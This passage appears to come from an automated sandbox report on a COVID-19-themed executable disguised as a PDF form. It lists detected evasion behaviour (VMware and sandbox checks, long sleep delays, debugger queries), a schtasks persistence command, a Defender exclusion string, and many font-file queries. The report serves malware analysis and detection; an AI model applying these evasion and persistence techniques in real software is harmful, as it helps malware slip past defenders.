                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOX

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5700Thread sleep time: -42124s >= -30000s
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5920Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 3164Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5224Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 42124
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 60000
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228699626.0000000006C9C000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:ringFileInfo
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
